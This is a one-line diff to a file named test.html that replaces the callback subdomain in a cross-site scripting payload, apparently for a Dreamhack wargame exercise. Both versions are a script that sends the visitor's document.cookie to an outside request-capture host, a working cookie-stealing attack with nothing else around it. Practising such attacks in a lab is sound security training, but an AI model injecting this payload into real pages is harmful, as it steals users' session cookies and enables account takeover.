--- a/test.html
+++ b/test.html
@@ -1,1 +1,1 @@
-<script>location.href='https://xtkdckc.request.dreamhack.games/'+document.cookie</script>
+<script>location.href='https://jwdhfct.request.dreamhack.games/'+document.cookie</script>
